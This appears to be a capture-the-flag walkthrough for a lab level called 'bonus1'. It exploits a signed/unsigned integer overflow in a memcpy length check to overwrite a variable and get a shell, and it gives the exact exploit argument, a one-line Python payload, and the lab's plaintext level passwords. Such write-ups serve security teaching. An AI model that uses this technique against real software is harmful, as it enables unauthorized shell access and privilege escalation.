1. Download the binary from the server:
   scp -P 2222 bonus1@localhost:~/bonus1 .
   Password: cd1f77a585965341c37a1774a1d1686326e1fc53aaa5459c840409d4d06523c9

2. Analyze the binary with Ghidra:
   - atoi(argv[1]) converts first argument to signed integer (num)
   - Check: num <= 9 (signed comparison)
   - memcpy(buffer, argv[2], num * 4) - num is signed but length is unsigned
   - Integer overflow: negative num passes check, num * 4 wraps to large unsigned value
   - Buffer: 40 bytes at ESP+0x14
   - Variable num: stored at ESP+0x3c (44 bytes from buffer start)
   - Victory condition: if num == 0x574f4c46, executes /bin/sh

3. Connect to the VM via SSH:
   ssh bonus1@localhost -p 2222
   Password: cd1f77a585965341c37a1774a1d1686326e1fc53aaa5459c840409d4d06523c9

4. Calculate the exploit:
   Goal: Overflow 44 bytes (40 buffer + 4 to overwrite num with 0x574f4c46)
   
   Use -2147483637 (0x8000000B):
   - Passes signed check: -2147483637 <= 9 ✓
   - Multiplication wraps: -2147483637 * 4 = large unsigned value ✓
   
   Payload structure:
   - 40 bytes padding
   - 4 bytes: 0x574f4c46 in little-endian (\x46\x4c\x4f\x57)

5. Execute the exploit:
   ./bonus1 -2147483637 $(python -c 'print "A"*40 + "\x46\x4c\x4f\x57"')

6. Read the password:
   cat /home/user/bonus2/.pass
   
   Password: 579bd19263eb8655e4cf7b742d75edf8c38226925d78db8163506f5191825245

7. Exit and login as bonus2:
   su bonus2
